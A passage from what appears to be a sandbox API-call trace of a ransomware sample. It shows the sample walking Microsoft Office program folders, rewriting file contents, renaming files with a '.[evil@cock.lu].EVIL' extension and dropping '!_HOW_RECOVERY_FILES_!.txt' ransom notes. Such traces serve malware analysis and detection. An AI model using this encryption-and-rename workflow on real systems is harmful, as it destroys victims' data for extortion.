dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.430] GetLastError () returned 0x2 [0104.430] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.430] wcsstr (_Str="AppvIsvStream64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.430] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 66 [0104.430] wcscmp (_String1="AppvIsvStream64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.430] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvStream64.dll") returned 0x0 [0104.430] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 0x42 [0104.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.431] GetLastError () returned 0x2 [0104.431] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.431] wcsstr (_Str="AppvIsvSubsystems32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.431] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 70 [0104.431] wcscmp (_String1="AppvIsvSubsystems32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.431] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvSubsystems32.dll") returned 0x0 [0104.431] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 0x46 [0104.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.431] GetLastError () returned 0x2 [0104.431] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.431] wcsstr (_Str="AppvIsvSubsystems64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.431] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 70 [0104.431] wcscmp (_String1="AppvIsvSubsystems64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.431] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvSubsystems64.dll") returned 0x0 [0104.431] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 0x46 [0104.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.432] GetLastError () returned 0x2 [0104.432] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.432] wcsstr (_Str="AppVLP.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.432] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 57 [0104.432] wcscmp (_String1="AppVLP.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.432] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVLP.exe") returned 0x0 [0104.432] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 0x39 [0104.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.433] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x79cc8, lpOverlapped=0x0) returned 1 [0104.449] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.449] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.449] _errno () returned 0x84b1160840 [0104.450] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.450] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x79ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x79ce0, lpOverlapped=0x0) returned 1 [0104.451] CloseHandle (hObject=0x1a4) returned 1 [0104.451] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.451] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.451] __uncaught_exception () returned 0x84b1160800 [0104.451] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.452] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe.[evil@cock.lu].evil")) returned 1 [0104.452] ??_V@YAXPEAX@Z () returned 0x1 [0104.455] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe", dwFileAttributes=0x200) returned 0 [0104.455] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.455] wcsstr (_Str="C2R32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.455] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 56 [0104.455] wcscmp (_String1="C2R32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.455] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2R32.dll") returned 0x0 [0104.455] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 0x38 [0104.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.456] GetLastError () returned 0x2 [0104.456] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.456] wcsstr (_Str="C2R64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.456] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll") returned 56 [0104.456] wcscmp (_String1="C2R64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.456] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2R64.dll") returned 0x0 [0104.456] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll") returned 0x38 [0104.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\C2R64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0104.457] GetLastError () returned 0x2 [0104.457] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.457] wcsstr (_Str="mfc140u.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.457] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 58 [0104.457] wcscmp (_String1="mfc140u.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.457] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mfc140u.dll") returned 0x0 [0104.457] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll") returned 0x3a [0104.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.459] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0104.502] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.502] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.502] _errno () returned 0x84b1160840 [0104.503] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.503] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0104.525] CloseHandle (hObject=0x1a4) returned 1 [0104.525] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.525] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.525] __uncaught_exception () returned 0x84b1160800 [0104.525] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.544] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll.[evil@cock.lu].evil")) returned 1 [0104.545] ??_V@YAXPEAX@Z () returned 0x1 [0104.548] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll", dwFileAttributes=0x200) returned 0 [0104.548] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.548] wcsstr (_Str="msvcp120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.548] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll") returned 59 [0104.548] wcscmp (_String1="msvcp120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.548] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcp120.dll") returned 0x0 [0104.548] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll") returned 0x3b [0104.549] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.551] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xa12a8, lpOverlapped=0x0) returned 1 [0104.575] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.575] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.575] _errno () returned 0x84b1160840 [0104.576] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.576] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xa12c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xa12c0, lpOverlapped=0x0) returned 1 [0104.577] CloseHandle (hObject=0x1a4) returned 1 [0104.578] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.578] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.578] __uncaught_exception () returned 0x84b1160800 [0104.578] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.578] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll.[evil@cock.lu].evil")) returned 1 [0104.579] ??_V@YAXPEAX@Z () returned 0x1 [0104.582] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll", dwFileAttributes=0x200) returned 0 [0104.582] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.582] wcsstr (_Str="msvcr120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.582] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll") returned 59 [0104.582] wcscmp (_String1="msvcr120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.582] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcr120.dll") returned 0x0 [0104.583] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll") returned 0x3b [0104.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.585] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xeb2a8, lpOverlapped=0x0) returned 1 [0104.619] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.619] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.619] _errno () returned 0x84b1160840 [0104.620] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.620] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xeb2c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xeb2c0, lpOverlapped=0x0) returned 1 [0104.622] CloseHandle (hObject=0x1a4) returned 1 [0104.622] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.622] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.622] __uncaught_exception () returned 0x84b1160800 [0104.622] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.622] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcr120.dll.[evil@cock.lu].evil")) returned 1 [0104.623] ??_V@YAXPEAX@Z () returned 0x1 [0104.626] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\msvcr120.dll", dwFileAttributes=0x200) returned 0 [0104.626] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.626] wcsstr (_Str="ucrtbase.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.626] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 59 [0104.626] wcscmp (_String1="ucrtbase.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.626] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ucrtbase.dll") returned 0x0 [0104.626] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 0x3b [0104.626] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.635] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xefec0, lpOverlapped=0x0) returned 1 [0104.795] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.795] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.795] _errno () returned 0x84b1160840 [0104.796] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.796] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xefee0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xefee0, lpOverlapped=0x0) returned 1 [0104.798] CloseHandle (hObject=0x1a4) returned 1 [0104.798] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.798] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.798] __uncaught_exception () returned 0x84b1160800 [0104.798] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.799] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll.[evil@cock.lu].evil")) returned 1 [0104.799] ??_V@YAXPEAX@Z () returned 0x1 [0104.802] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll", dwFileAttributes=0x200) returned 0 [0104.802] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0104.802] FindClose (in: hFindFile=0x84b11ddd40 | out: hFindFile=0x84b11ddd40) returned 1 [0104.802] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client") returned 0x2e [0104.802] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0104.802] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0104.802] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.803] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0104.803] __uncaught_exception () returned 0x84b1160800 [0104.803] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.804] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0104.804] wcsstr (_Str="CLIPART", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.804] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART") returned 47 [0104.804] wcscmp (_String1=".", _String2="CLIPART") returned -1 [0104.804] wcscmp (_String1="..", _String2="CLIPART") returned -1 [0104.804] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART") returned 0x2f [0104.804] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART") returned 0x0 [0104.804] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\*") returned="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\*" [0104.804] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd3e0 [0104.838] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.838] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\.") returned 49 [0104.838] wcscmp (_String1=".", _String2=".") returned 0 [0104.838] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.838] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.838] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\..") returned 50 [0104.838] wcscmp (_String1=".", _String2="..") returned -1 [0104.838] wcscmp (_String1="..", _String2="..") returned 0 [0104.838] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.838] wcsstr (_Str="PUB60COR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.838] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR") returned 56 [0104.838] wcscmp (_String1=".", _String2="PUB60COR") returned -1 [0104.838] wcscmp (_String1="..", _String2="PUB60COR") returned -1 [0104.838] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR") returned 0x38 [0104.838] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR") returned 0x0 [0104.838] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\*") returned="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\*" [0104.838] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd980 [0104.880] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.880] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\.") returned 58 [0104.880] wcscmp (_String1=".", _String2=".") returned 0 [0104.880] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.886] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.886] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\..") returned 59 [0104.886] wcscmp (_String1=".", _String2="..") returned -1 [0104.886] wcscmp (_String1="..", _String2="..") returned 0 [0104.886] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.886] wcsstr (_Str="AG00004_.GIF", 